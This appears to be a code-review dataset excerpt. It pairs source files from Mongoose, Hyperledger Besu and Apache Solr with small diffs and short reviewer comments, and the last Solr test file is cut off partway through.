`socket#setTimeout()` function](https://nodejs.org/api/net.html#net_socket_settimeout_timeout_callback) after the MongoDB driver successfully completes. * @param {Number} [options.family=0] Passed transparently to [Node.js' `dns.lookup()`](https://nodejs.org/api/dns.html#dns_dns_lookup_hostname_options_callback) function. May be either `0`, `4`, or `6`. `4` means use IPv4 only, `6` means use IPv6 only, `0` means try both. * @return {Connection} the created Connection object. Connections are thenable, so you can do `await mongoose.createConnection()` * @api public */ Mongoose.prototype.createConnection = function(uri, options, callback) { const _mongoose = this instanceof Mongoose ? this : mongoose; const conn = new Connection(_mongoose); if (typeof options === 'function') { callback = options; options = null; } _mongoose.connections.push(conn); if (arguments.length > 0) { return conn.openUri(uri, options, callback); } return conn; }; /** * Opens the default mongoose connection. * * ####Example: * * mongoose.connect('mongodb://user:pass@localhost:port/database'); * * // replica sets * const uri = 'mongodb://user:pass@localhost:port,anotherhost:port,yetanother:port/mydatabase'; * mongoose.connect(uri); * * // with options * mongoose.connect(uri, options); * * // optional callback that gets fired when initial connection completed * const uri = 'mongodb://nonexistent.domain:27000'; * mongoose.connect(uri, function(error) { * // if error is truthy, the initial connection failed. * }) * * @param {String} uri(s) * @param {Object} [options] passed down to the [MongoDB driver's `connect()` function](http://mongodb.github.io/node-mongodb-native/3.0/api/MongoClient.html), except for 4 mongoose-specific options explained below. * @param {Boolean} [options.bufferCommands=true] Mongoose specific option. Set to false to [disable buffering](http://mongoosejs.com/docs/faq.html#callback_never_executes) on all models associated with this connection. * @param {Number} [options.bufferTimeoutMS=true] Mongoose specific option. If `bufferCommands` is true, Mongoose will throw an error after `bufferTimeoutMS` if the operation is still buffered. * @param {String} [options.dbName] The name of the database we want to use. If not provided, use database name from connection string. * @param {String} [options.user] username for authentication, equivalent to `options.auth.user`. Maintained for backwards compatibility. * @param {String} [options.pass] password for authentication, equivalent to `options.auth.password`. Maintained for backwards compatibility. * @param {Number} [options.poolSize=5] The maximum number of sockets the MongoDB driver will keep open for this connection. By default, `poolSize` is 5. Keep in mind that, as of MongoDB 3.4, MongoDB only allows one operation per socket at a time, so you may want to increase this if you find you have a few slow queries that are blocking faster queries from proceeding. See [Slow Trains in MongoDB and Node.js](http://thecodebarbarian.com/slow-trains-in-mongodb-and-nodejs). * @param {Boolean} [options.useUnifiedTopology=false] False by default. Set to `true` to opt in to the MongoDB driver's replica set and sharded cluster monitoring engine. * @param {Number} [options.serverSelectionTimeoutMS] If `useUnifiedTopology = true`, the MongoDB driver will try to find a server to send any given operation to, and keep retrying for `serverSelectionTimeoutMS` milliseconds before erroring out. If not set, the MongoDB driver defaults to using `30000` (30 seconds). * @param {Number} [options.heartbeatFrequencyMS] If `useUnifiedTopology = true`, the MongoDB driver sends a heartbeat every `heartbeatFrequencyMS` to check on the status of the connection. A heartbeat is subject to `serverSelectionTimeoutMS`, so the MongoDB driver will retry failed heartbeats for up to 30 seconds by default. Mongoose only emits a `'disconnected'` event after a heartbeat has failed, so you may want to decrease this setting to reduce the time between when your server goes down and when Mongoose emits `'disconnected'`. We recommend you do **not** set this setting below 1000, too many heartbeats can lead to performance degradation. * @param {Boolean} [options.autoIndex=true] Mongoose-specific option. Set to false to disable automatic index creation for all models associated with this connection. * @param {Boolean} [options.useNewUrlParser=false] False by default. Set to `true` to opt in to the MongoDB driver's new URL parser logic. * @param {Boolean} [options.useCreateIndex=true] Mongoose-specific option. If `true`, this connection will use [`createIndex()` instead of `ensureIndex()`](/docs/deprecations.html#ensureindex) for automatic index builds via [`Model.init()`](/docs/api.html#model_Model.init). * @param {Boolean} [options.useFindAndModify=true] True by default. Set to `false` to make `findOneAndUpdate()` and `findOneAndRemove()` use native `findOneAndUpdate()` rather than `findAndModify()`. * @param {Number} [options.reconnectTries=30] If you're connected to a single server or mongos proxy (as opposed to a replica set), the MongoDB driver will try to reconnect every `reconnectInterval` milliseconds for `reconnectTries` times, and give up afterward. When the driver gives up, the mongoose connection emits a `reconnectFailed` event. This option does nothing for replica set connections. * @param {Number} [options.reconnectInterval=1000] See `reconnectTries` option above. * @param {Class} [options.promiseLibrary] Sets the [underlying driver's promise library](http://mongodb.github.io/node-mongodb-native/3.1/api/MongoClient.html). * @param {Number} [options.bufferMaxEntries] This option does nothing if `useUnifiedTopology` is set. The MongoDB driver also has its own buffering mechanism that kicks in when the driver is disconnected. Set this option to 0 and set `bufferCommands` to `false` on your schemas if you want your database operations to fail immediately when the driver is not connected, as opposed to waiting for reconnection. * @param {Number} [options.connectTimeoutMS=30000] How long the MongoDB driver will wait before killing a socket due to inactivity _during initial connection_. Defaults to 30000. This option is passed transparently to [Node.js' `socket#setTimeout()` function](https://nodejs.org/api/net.html#net_socket_settimeout_timeout_callback). * @param {Number} [options.socketTimeoutMS=30000] How long the MongoDB driver will wait before killing a socket due to inactivity _after initial connection_. A socket may be inactive because of either no activity or a long-running operation. This is set to `30000` by default, you should set this to 2-3x your longest running operation if you expect some of your database operations to run longer than 20 seconds. This option is passed to [Node.js `socket#setTimeout()` function](https://nodejs.org/api/net.html#net_socket_settimeout_timeout_callback) after the MongoDB driver successfully completes. * @param {Number} [options.family=0] Passed transparently to [Node.js' `dns.lookup()`](https://nodejs.org/api/dns.html#dns_dns_lookup_hostname_options_callback) function. May be either `0`, `4`, or `6`. `4` means use IPv4 only, `6` means use IPv6 only, `0` means try both. * @param {Boolean} [options.autoCreate=false] Set to `true` to make Mongoose automatically call `createCollection()` on every model created on this connection. * @param {Function} [callback] * @see Mongoose#createConnection #index_Mongoose-createConnection * @api public * @return {Promise} resolves to `this` if connection succeeded */ Mongoose.prototype.connect = function(uri, options, callback) { const _mongoose = this instanceof Mongoose ? this : mongoose; const conn = _mongoose.connection; return _mongoose._promiseOrCallback(callback, cb => { conn.openUri(uri, options, err => { if (err != null) { return cb(err); } return cb(null, _mongoose); }); }); }; /** * Runs `.close()` on all connections in parallel. * * @param {Function} [callback] called after all connection close, or when first error occurred. * @return {Promise} resolves when all connections are closed, or rejects with the first error that occurred. * @api public */ Mongoose.prototype.disconnect = function(callback) { const _mongoose = this instanceof Mongoose ? this : mongoose; return _mongoose._promiseOrCallback(callback, cb => { let remaining = _mongoose.connections.length; if (remaining <= 0) { return cb(null); } _mongoose.connections.forEach(conn => { conn.close(function(error) { if (error) { return cb(error); } if (!--remaining) { cb(null); } }); }); }); }; /** * _Requires MongoDB >= 3.6.0._ Starts a [MongoDB session](https://docs.mongodb.com/manual/release-notes/3.6/#client-sessions) * for benefits like causal consistency, [retryable writes](https://docs.mongodb.com/manual/core/retryable-writes/), * and [transactions](http://thecodebarbarian.com/a-node-js-perspective-on-mongodb-4-transactions.html). * * Calling `mongoose.startSession()` is equivalent to calling `mongoose.connection.startSession()`. * Sessions are scoped to a connection, so calling `mongoose.startSession()` * starts a session on the [default mongoose connection](/docs/api.html#mongoose_Mongoose-connection). * * @param {Object} [options] see the [mongodb driver options](http://mongodb.github.io/node-mongodb-native/3.0/api/MongoClient.html#startSession) * @param {Boolean} [options.causalConsistency=true] set to false to disable causal consistency * @param {Function} [callback] * @return {Promise<ClientSession>} promise that resolves to a MongoDB driver `ClientSession` * @api public */ Mongoose.prototype.startSession = function() { const _mongoose = this instanceof Mongoose ? this : mongoose; return _mongoose.connection.startSession.apply(_mongoose.connection, arguments); }; /** * Getter/setter around function for pluralizing collection names. * * @param {Function|null} [fn] overwrites the function used to pluralize collection names * @return {Function|null} the current function used to pluralize collection names, defaults to the legacy function from `mongoose-legacy-pluralize`. * @api public */ Mongoose.prototype.pluralize = function(fn) { const _mongoose = this instanceof Mongoose ? this : mongoose; if (arguments.length > 0) { _mongoose._pluralize = fn; } return _mongoose._pluralize; }; /** * Defines a model or retrieves it. * * Models defined on the `mongoose` instance are available to all connection * created by the same `mongoose` instance. * * If you call `mongoose.model()` with twice the same name but a different schema, * you will get an `OverwriteModelError`. If you call `mongoose.model()` with * the same name and same schema, you'll get the same schema back. * * ####Example: * * const mongoose = require('mongoose'); * * // define an Actor model with this mongoose instance * const schema = new Schema({ name: String }); * mongoose.model('Actor', schema); * * // create a new connection * const conn = mongoose.createConnection(..); * * // create Actor model * const Actor = conn.model('Actor', schema); * conn.model('Actor') === Actor; // true * conn.model('Actor', schema) === Actor; // true, same schema * conn.model('Actor', schema, 'actors') === Actor; // true, same schema and collection name * * // This throws an `OverwriteModelError` because the schema is different. * conn.model('Actor', new Schema({ name: String })); * * _When no `collection` argument is passed, Mongoose uses the model name. If you don't like this behavior, either pass a collection name, use `mongoose.pluralize()`, or set your schemas collection name option._ * * ####Example: * * const schema = new Schema({ name: String }, { collection: 'actor' }); * * // or * * schema.set('collection', 'actor'); * * // or * * const collectionName = 'actor' * const M = mongoose.model('Actor', schema, collectionName) * * @param {String|Function} name model name or class extending Model * @param {Schema} [schema] the schema to use. * @param {String} [collection] name (optional, inferred from model name) * @param {Boolean|Object} [skipInit] whether to skip initialization (defaults to false). If an object, treated as options. * @return {Model} The model associated with `name`. Mongoose will create the model if it doesn't already exist. * @api public */ Mongoose.prototype.model = function(name, schema, collection, skipInit) { const _mongoose = this instanceof Mongoose ? this : mongoose; let model; if (typeof name === 'function') { model = name; name = model.name; if (!(model.prototype instanceof Model)) { throw new _mongoose.Error('The provided class ' + name + ' must extend Model'); } } if (typeof schema === 'string') { collection = schema; schema = false; } if (utils.isObject(schema) && !(schema instanceof Schema)) { schema = new Schema(schema); } if (schema && !(schema instanceof Schema)) { throw new Error('The 2nd parameter to `mongoose.model()` should be a ' + 'schema or a POJO'); } if (typeof collection === 'boolean') { skipInit = collection; collection = null; } // handle internal options from connection.model() let options; if (skipInit && utils.isObject(skipInit)) { options = skipInit; skipInit = true; } else { options = {}; } // look up schema for the collection. if (!_mongoose.modelSchemas[name]) { if (schema) { // cache it so we only apply plugins once _mongoose.modelSchemas[name] = schema; } else { throw new mongoose.Error.MissingSchemaError(name); } } const originalSchema = schema; if (schema) { if (_mongoose.get('cloneSchemas')) { schema = schema.clone(); } _mongoose._applyPlugins(schema); } let sub; // connection.model() may be passing a different schema for // an existing model name. in this case don't read from cache. const overwriteModels = _mongoose.options.hasOwnProperty('overwriteModels') ? _mongoose.options.overwriteModels : options.overwriteModels; if (_mongoose.models[name] && options.cache !== false && overwriteModels !== true) { if (originalSchema && originalSchema.instanceOfSchema && originalSchema !== _mongoose.models[name].schema) { throw new _mongoose.Error.OverwriteModelError(name); } if (collection && collection !== _mongoose.models[name].collection.name) { // subclass current model with alternate collection model = _mongoose.models[name]; schema = model.prototype.schema; sub = model.__subclass(_mongoose.connection, schema, collection); // do not cache the sub model return sub; } return _mongoose.models[name]; } // ensure a schema exists if (!schema) { schema = this.modelSchemas[name]; if (!schema) { throw new mongoose.Error.MissingSchemaError(name); } } // Apply relevant "global" options to the schema if (!('pluralization' in schema.options)) { schema.options.pluralization = _mongoose.options.pluralization; } if (!collection) { collection = schema.get('collection') || utils.toCollectionName(name, _mongoose.pluralize()); } const connection = options.connection || _mongoose.connection; model = _mongoose.Model.compile(model || name, schema, collection, connection, _mongoose); if (!skipInit) { // Errors handled internally, so safe to ignore error model.init(function $modelInitNoop() {}); } if (options.cache === false) { return model; } _mongoose.models[name] = model; return _mongoose.models[name]; }; /** * Removes the model named `name` from the default connection, if it exists. * You can use this function to clean up any models you created in your tests to * prevent OverwriteModelErrors. * * Equivalent to `mongoose.connection.deleteModel(name)`. * * ####Example: * * mongoose.model('User', new Schema({ name: String })); * console.log(mongoose.model('User')); // Model object * mongoose.deleteModel('User'); * console.log(mongoose.model('User')); // undefined * * // Usually useful in a Mocha `afterEach()` hook * afterEach(function() { * mongoose.deleteModel(/.+/); // Delete every model * }); * * @api public * @param {String|RegExp} name if string, the name of the model to remove. If regexp, removes all models whose name matches the regexp. * @return {Mongoose} this */ Mongoose.prototype.deleteModel = function(name) { const _mongoose = this instanceof Mongoose ? this : mongoose; _mongoose.connection.deleteModel(name); return _mongoose; }; /** * Returns an array of model names created on this instance of Mongoose. * * ####Note: * * _Does not include names of models created using `connection.model()`._ * * @api public * @return {Array} */ Mongoose.prototype.modelNames = function() { const _mongoose = this instanceof Mongoose ? this : mongoose; const names = Object.keys(_mongoose.models); return names; }; /** * Applies global plugins to `schema`. * * @param {Schema} schema * @api private */ Mongoose.prototype._applyPlugins = function(schema, options) { const _mongoose = this instanceof Mongoose ? this : mongoose; options = options || {}; options.applyPluginsToDiscriminators = get(_mongoose, 'options.applyPluginsToDiscriminators', false); options.applyPluginsToChildSchemas = get(_mongoose, 'options.applyPluginsToChildSchemas', true); applyPlugins(schema, _mongoose.plugins, options, '$globalPluginsApplied'); }; /** * Declares a global plugin executed on all Schemas. * * Equivalent to calling `.plugin(fn)` on each Schema you create. * * @param {Function} fn plugin callback * @param {Object} [opts] optional options * @return {Mongoose} this * @see plugins ./plugins.html * @api public */ Mongoose.prototype.plugin = function(fn, opts) { const _mongoose = this instanceof Mongoose ? this : mongoose; _mongoose.plugins.push([fn, opts]); return _mongoose; }; /** * The Mongoose module's default connection. Equivalent to `mongoose.connections[0]`, see [`connections`](#mongoose_Mongoose-connections). * * ####Example: * * const mongoose = require('mongoose'); * mongoose.connect(...); * mongoose.connection.on('error', cb); * * This is the connection used by default for every model created using [mongoose.model](#index_Mongoose-model). * * To create a new connection, use [`createConnection()`](#mongoose_Mongoose-createConnection). * * @memberOf Mongoose * @instance * @property {Connection} connection * @api public */ Mongoose.prototype.__defineGetter__('connection', function() { return this.connections[0]; }); Mongoose.prototype.__defineSetter__('connection', function(v) { if (v instanceof Connection) { this.connections[0] = v; this.models = v.models; } }); /** * An array containing all [connections](connections.html) associated with this * Mongoose instance. By default, there is 1 connection. Calling * [`createConnection()`](#mongoose_Mongoose-createConnection) adds a connection * to this array. * * ####Example: * * const mongoose = require('mongoose'); * mongoose.connections.length; // 1, just the default connection * mongoose.connections[0] === mongoose.connection; // true * * mongoose.createConnection('mongodb://localhost:27017/test'); * mongoose.connections.length; // 2 * * @memberOf Mongoose * @instance * @property {Array} connections * @api public */ Mongoose.prototype.connections; /*! * Driver dependent APIs */ const driver = global.MONGOOSE_DRIVER_PATH || './drivers/node-mongodb-native'; /*! * Connection */ const Connection = require(driver + '/connection'); /*! * Collection */ const Collection = require(driver + '/collection'); /** * The Mongoose Aggregate constructor * * @method Aggregate * @api public */ Mongoose.prototype.Aggregate = Aggregate; /** * The Mongoose Collection constructor * * @method Collection * @api public */ Mongoose.prototype.Collection = Collection; /** * The Mongoose [Connection](#connection_Connection) constructor * * @memberOf Mongoose * @instance * @method Connection * @api public */ Mongoose.prototype.Connection = Connection; /** * The Mongoose version * * #### Example * * console.log(mongoose.version); // '5.x.x' * * @property version * @api public */ Mongoose.prototype.version = pkg.version; /** * The Mongoose constructor * * The exports of the mongoose module is an instance of this class. * * ####Example: * * const mongoose = require('mongoose'); * const mongoose2 = new mongoose.Mongoose(); * * @method Mongoose * @api public */ Mongoose.prototype.Mongoose = Mongoose; /** * The Mongoose [Schema](#schema_Schema) constructor * * ####Example: * * const mongoose = require('mongoose'); * const Schema = mongoose.Schema; * const CatSchema = new Schema(..); * * @method Schema * @api public */ Mongoose.prototype.Schema = Schema; /** * The Mongoose [SchemaType](#schematype_SchemaType) constructor * * @method SchemaType * @api public */ Mongoose.prototype.SchemaType = SchemaType; /** * The various Mongoose SchemaTypes. * * ####Note: * * _Alias of mongoose.Schema.Types for backwards compatibility._ * * @property SchemaTypes * @see Schema.SchemaTypes #schema_Schema.Types * @api public */ Mongoose.prototype.SchemaTypes = Schema.Types; /** * The Mongoose [VirtualType](#virtualtype_VirtualType) constructor * * @method VirtualType * @api public */ Mongoose.prototype.VirtualType = VirtualType; /** * The various Mongoose Types. * * ####Example: * * const mongoose = require('mongoose'); * const array = mongoose.Types.Array; * * ####Types: * * - [ObjectId](#types-objectid-js) * - [Buffer](#types-buffer-js) * - [SubDocument](#types-embedded-js) * - [Array](#types-array-js) * - [DocumentArray](#types-documentarray-js) * * Using this exposed access to the `ObjectId` type, we can construct ids on demand. * * const ObjectId = mongoose.Types.ObjectId; * const id1 = new ObjectId; * * @property Types * @api public */ Mongoose.prototype.Types = Types; /** * The Mongoose [Query](#query_Query) constructor. * * @method Query * @api public */ Mongoose.prototype.Query = Query; /** * The Mongoose [Promise](#promise_Promise) constructor. * * @memberOf Mongoose * @instance * @property Promise * @api public */ Object.defineProperty(Mongoose.prototype, 'Promise', { get: function() { return PromiseProvider.get(); }, set: function(lib) { PromiseProvider.set(lib); } }); /** * Storage layer for mongoose promises * * @method PromiseProvider * @api public */ Mongoose.prototype.PromiseProvider = PromiseProvider; /** * The Mongoose [Model](#model_Model) constructor. * * @method Model * @api public */ Mongoose.prototype.Model = Model; /** * The Mongoose [Document](/api/document.html) constructor. * * @method Document * @api public */ Mongoose.prototype.Document = Document; /** * The Mongoose DocumentProvider constructor. Mongoose users should not have to * use this directly * * @method DocumentProvider * @api public */ Mongoose.prototype.DocumentProvider = require('./document_provider'); /** * The Mongoose ObjectId [SchemaType](/docs/schematypes.html). Used for * declaring paths in your schema that should be * [MongoDB ObjectIds](https://docs.mongodb.com/manual/reference/method/ObjectId/). * Do not use this to create a new ObjectId instance, use `mongoose.Types.ObjectId` * instead. * * ####Example: * * const childSchema = new Schema({ parentId: mongoose.ObjectId }); * * @property ObjectId * @api public */ Mongoose.prototype.ObjectId = SchemaTypes.ObjectId; /** * Returns true if Mongoose can cast the given value to an ObjectId, or * false otherwise. * * ####Example: * * mongoose.isValidObjectId(new mongoose.Types.ObjectId()); // true * mongoose.isValidObjectId('0123456789ab'); // true * mongoose.isValidObjectId(6); // false * * @method isValidObjectId * @api public */ Mongoose.prototype.isValidObjectId = function(v) { if (v == null) { return true; } const base = this || mongoose; const ObjectId = base.driver.get().ObjectId; if (v instanceof ObjectId) { return true; } if (v._id != null) { if (v._id instanceof ObjectId) { return true; } if (v._id.toString instanceof Function) { v = v._id.toString(); return typeof v === 'string' && (v.length === 12 || v.length === 24); } } if (v.toString instanceof Function) { v = v.toString(); } if (typeof v === 'string' && (v.length === 12 || v.length === 24)) { return true; } return false; }; /** * The Mongoose Decimal128 [SchemaType](/docs/schematypes.html). Used for * declaring paths in your schema that should be * [128-bit decimal floating points](http://thecodebarbarian.com/a-nodejs-perspective-on-mongodb-34-decimal.html). * Do not use this to create a new Decimal128 instance, use `mongoose.Types.Decimal128` * instead. * * ####Example: * * const vehicleSchema = new Schema({ fuelLevel: mongoose.Decimal128 }); * * @property Decimal128 * @api public */ Mongoose.prototype.Decimal128 = SchemaTypes.Decimal128; /** * The Mongoose Mixed [SchemaType](/docs/schematypes.html). Used for * declaring paths in your schema that Mongoose's change tracking, casting, * and validation should ignore. * * ####Example: * * const schema = new Schema({ arbitrary: mongoose.Mixed }); * * @property Mixed * @api public */ Mongoose.prototype.Mixed = SchemaTypes.Mixed; /** * The Mongoose Date [SchemaType](/docs/schematypes.html). * * ####Example: * * const schema = new Schema({ test: Date }); * schema.path('test') instanceof mongoose.Date; // true * * @property Date * @api public */ Mongoose.prototype.Date = SchemaTypes.Date; /** * The Mongoose Number [SchemaType](/docs/schematypes.html). Used for * declaring paths in your schema that Mongoose should cast to numbers. * * ####Example: * * const schema = new Schema({ num: mongoose.Number }); * // Equivalent to: * const schema = new Schema({ num: 'number' }); * * @property Number * @api public */ Mongoose.prototype.Number = SchemaTypes.Number; /** * The [MongooseError](#error_MongooseError) constructor. * * @method Error * @api public */ Mongoose.prototype.Error = require('./error/index'); /** * Mongoose uses this function to get the current time when setting * [timestamps](/docs/guide.html#timestamps). You may stub out this function * using a tool like [Sinon](https://www.npmjs.com/package/sinon) for testing. * * @method now * @returns Date the current time * @api public */ Mongoose.prototype.now = function now() { return new Date(); }; /** * The Mongoose CastError constructor * * @method CastError * @param {String} type The name of the type * @param {Any} value The value that failed to cast * @param {String} path The path `a.b.c` in the doc where this cast error occurred * @param {Error} [reason] The original error that was thrown * @api public */ Mongoose.prototype.CastError = require('./error/cast'); /** * The constructor used for schematype options * * @method SchemaTypeOptions * @api public */ Mongoose.prototype.SchemaTypeOptions = require('./options/SchemaTypeOptions'); /** * The [node-mongodb-native](https://github.com/mongodb/node-mongodb-native) driver Mongoose uses. * * @property mongo * @api public */ Mongoose.prototype.mongo = require('mongodb'); /** * The [mquery](https://github.com/aheckmann/mquery) query builder Mongoose uses. * * @property mquery * @api public */ Mongoose.prototype.mquery = require('mquery'); /*! * ignore */ Mongoose.prototype._promiseOrCallback = function(callback, fn, ee) { return promiseOrCallback(callback, fn, ee, this.Promise); }; /*! * The exports object is an instance of Mongoose. * * @api public */ const mongoose = module.exports = exports = new Mongoose({ [defaultMongooseSymbol]: true });
1
14,551
You also need to add a similar check on line 992, there's another place where we check `length === 24`
Automattic-mongoose
js
@@ -105,9 +105,14 @@ public class BftBlockCreatorFactory { public Bytes createExtraData(final int round, final BlockHeader parentHeader) { final BftContext bftContext = protocolContext.getConsensusState(BftContext.class); final ValidatorProvider validatorProvider = bftContext.getValidatorProvider(); - checkState(validatorProvider.getVoteProvider().isPresent(), "Bft requires a vote provider"); + checkState( + validatorProvider.getVoteProviderAfterBlock(parentHeader).isPresent(), + "Bft requires a vote provider"); final Optional<ValidatorVote> proposal = - validatorProvider.getVoteProvider().get().getVoteAfterBlock(parentHeader, localAddress); + validatorProvider + .getVoteProviderAfterBlock(parentHeader) + .get() + .getVoteAfterBlock(parentHeader, localAddress); final List<Address> validators = new ArrayList<>(validatorProvider.getValidatorsAfterBlock(parentHeader));
1
/* * Copyright ConsenSys AG. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on * an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the * specific language governing permissions and limitations under the License. * * SPDX-License-Identifier: Apache-2.0 */ package org.hyperledger.besu.consensus.common.bft.blockcreation; import static com.google.common.base.Preconditions.checkState; import org.hyperledger.besu.consensus.common.ConsensusHelpers; import org.hyperledger.besu.consensus.common.bft.BftContext; import org.hyperledger.besu.consensus.common.bft.BftExtraData; import org.hyperledger.besu.consensus.common.bft.BftExtraDataCodec; import org.hyperledger.besu.consensus.common.bft.Vote; import org.hyperledger.besu.consensus.common.validator.ValidatorProvider; import org.hyperledger.besu.consensus.common.validator.ValidatorVote; import org.hyperledger.besu.datatypes.Address; import org.hyperledger.besu.datatypes.Wei; import org.hyperledger.besu.ethereum.ProtocolContext; import org.hyperledger.besu.ethereum.blockcreation.BlockCreator; import org.hyperledger.besu.ethereum.core.BlockHeader; import org.hyperledger.besu.ethereum.core.MiningParameters; import org.hyperledger.besu.ethereum.eth.transactions.sorter.AbstractPendingTransactionsSorter; import org.hyperledger.besu.ethereum.mainnet.AbstractGasLimitSpecification; import org.hyperledger.besu.ethereum.mainnet.ProtocolSchedule; import java.util.ArrayList; import java.util.Collections; import java.util.List; import java.util.Optional; import java.util.concurrent.atomic.AtomicLong; import org.apache.tuweni.bytes.Bytes; public class BftBlockCreatorFactory { private final AbstractPendingTransactionsSorter pendingTransactions; protected final ProtocolContext protocolContext; protected final ProtocolSchedule protocolSchedule; protected final BftExtraDataCodec bftExtraDataCodec; private final Address localAddress; final Address miningBeneficiary; protected volatile Bytes vanityData; private volatile Wei minTransactionGasPrice; private volatile Double minBlockOccupancyRatio; private volatile Optional<AtomicLong> targetGasLimit; public BftBlockCreatorFactory( final AbstractPendingTransactionsSorter pendingTransactions, final ProtocolContext protocolContext, final ProtocolSchedule protocolSchedule, final MiningParameters miningParams, final Address localAddress, final Address miningBeneficiary, final BftExtraDataCodec bftExtraDataCodec) { this.pendingTransactions = pendingTransactions; this.protocolContext = protocolContext; this.protocolSchedule = protocolSchedule; this.localAddress = localAddress; this.minTransactionGasPrice = miningParams.getMinTransactionGasPrice(); this.minBlockOccupancyRatio = miningParams.getMinBlockOccupancyRatio(); this.vanityData = miningParams.getExtraData(); this.miningBeneficiary = miningBeneficiary; this.bftExtraDataCodec = bftExtraDataCodec; this.targetGasLimit = miningParams.getTargetGasLimit(); } public BlockCreator create(final BlockHeader parentHeader, final int round) { return new BftBlockCreator( localAddress, () -> targetGasLimit.map(AtomicLong::longValue), ph -> createExtraData(round, ph), pendingTransactions, protocolContext, protocolSchedule, minTransactionGasPrice, minBlockOccupancyRatio, parentHeader, miningBeneficiary, bftExtraDataCodec); } public void setExtraData(final Bytes extraData) { this.vanityData = extraData.copy(); } public void setMinTransactionGasPrice(final Wei minTransactionGasPrice) { this.minTransactionGasPrice = minTransactionGasPrice; } public Wei getMinTransactionGasPrice() { return minTransactionGasPrice; } public Bytes createExtraData(final int round, final BlockHeader parentHeader) { final BftContext bftContext = protocolContext.getConsensusState(BftContext.class); final ValidatorProvider validatorProvider = bftContext.getValidatorProvider(); checkState(validatorProvider.getVoteProvider().isPresent(), "Bft requires a vote provider"); final Optional<ValidatorVote> proposal = validatorProvider.getVoteProvider().get().getVoteAfterBlock(parentHeader, localAddress); final List<Address> validators = new ArrayList<>(validatorProvider.getValidatorsAfterBlock(parentHeader)); final BftExtraData extraData = new BftExtraData( ConsensusHelpers.zeroLeftPad(vanityData, BftExtraDataCodec.EXTRA_VANITY_LENGTH), Collections.emptyList(), toVote(proposal), round, validators); return bftExtraDataCodec.encode(extraData); } public void changeTargetGasLimit(final Long newTargetGasLimit) { if (AbstractGasLimitSpecification.isValidTargetGasLimit(newTargetGasLimit)) { this.targetGasLimit.ifPresentOrElse( existing -> existing.set(newTargetGasLimit), () -> this.targetGasLimit = Optional.of(new AtomicLong(newTargetGasLimit))); } else { throw new UnsupportedOperationException("Specified target gas limit is invalid"); } } public Address getLocalAddress() { return localAddress; } private static Optional<Vote> toVote(final Optional<ValidatorVote> input) { return input .map(v -> Optional.of(new Vote(v.getRecipient(), v.getVotePolarity()))) .orElse(Optional.empty()); } }
1
26,217
nit: can extract the voteProvider as a local variable
hyperledger-besu
java
@@ -1190,14 +1190,8 @@ public class QueryEqualityTest extends SolrTestCaseJ4 { assertFuncEquals("gte(foo_i,2)", "gte(foo_i,2)"); assertFuncEquals("eq(foo_i,2)", "eq(foo_i,2)"); - boolean equals = false; - try { - assertFuncEquals("eq(foo_i,2)", "lt(foo_i,2)"); - equals = true; - } catch (AssertionError e) { - //expected - } - assertFalse(equals); + expectThrows(AssertionError.class, "expected error, functions are not equal", + () -> assertFuncEquals("eq(foo_i,2)", "lt(foo_i,2)")); } public void testChildField() throws Exception {
1
/* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.solr.search; import java.util.HashSet; import java.util.Map; import java.util.Set; import junit.framework.AssertionFailedError; import org.apache.lucene.search.Query; import org.apache.lucene.search.QueryUtils; import org.apache.solr.SolrTestCaseJ4; import org.apache.solr.request.SolrQueryRequest; import org.apache.solr.request.SolrRequestInfo; import org.apache.solr.response.SolrQueryResponse; import org.junit.AfterClass; import org.junit.BeforeClass; /** * Sanity checks that queries (generated by the QParser and ValueSourceParser * framework) are appropriately {@link Object#equals} and * {@link Object#hashCode()} equivalent. If you are adding a new default * QParser or ValueSourceParser, you will most likely get a failure from * {@link #testParserCoverage} until you add a new test method to this class. * * @see ValueSourceParser#standardValueSourceParsers * @see QParserPlugin#standardPlugins * @see QueryUtils **/ public class QueryEqualityTest extends SolrTestCaseJ4 { @BeforeClass public static void beforeClass() throws Exception { initCore("solrconfig.xml","schema15.xml"); } /** @see #testParserCoverage */ @AfterClass public static void afterClassParserCoverageTest() { if ( ! doAssertParserCoverage) return; for (String name : QParserPlugin.standardPlugins.keySet()) { assertTrue("testParserCoverage was run w/o any other method explicitly testing qparser: " + name, qParsersTested.contains(name)); } for (final String name : ValueSourceParser.standardValueSourceParsers.keySet()) { assertTrue("testParserCoverage was run w/o any other method explicitly testing val parser: " + name, valParsersTested.contains(name)); } } /** @see #testParserCoverage */ private static boolean doAssertParserCoverage = false; /** @see #testParserCoverage */ private static final Set<String> qParsersTested = new HashSet<>(); /** @see #testParserCoverage */ private static final Set<String> valParsersTested = new HashSet<>(); public void testDateMathParsingEquality() throws Exception { // regardless of parser, these should all be equivalent queries assertQueryEquals (null ,"{!lucene}f_tdt:2013-09-11T00\\:00\\:00Z" ,"{!lucene}f_tdt:2013-03-08T00\\:46\\:15Z/DAY+6MONTHS+3DAYS" ,"{!lucene}f_tdt:\"2013-03-08T00:46:15Z/DAY+6MONTHS+3DAYS\"" ,"{!field f=f_tdt}2013-03-08T00:46:15Z/DAY+6MONTHS+3DAYS" ,"{!field f=f_tdt}2013-09-11T00:00:00Z" ,"{!term f=f_tdt}2013-03-08T00:46:15Z/DAY+6MONTHS+3DAYS" ,"{!term f=f_tdt}2013-09-11T00:00:00Z" ); } public void testQueryLucene() throws Exception { assertQueryEquals("lucene", "{!lucene}apache solr", "apache solr", "apache solr "); assertQueryEquals("lucene", "+apache +solr", "apache AND solr", " +apache +solr"); } public void testQueryPrefix() throws Exception { SolrQueryRequest req = req("myField","foo_s"); try { assertQueryEquals("prefix", req, "{!prefix f=$myField}asdf", "{!prefix f=foo_s}asdf"); } finally { req.close(); } } public void testQueryBoost() throws Exception { SolrQueryRequest req = req("df","foo_s","myBoost","sum(3,foo_i)"); try { assertQueryEquals("boost", req, 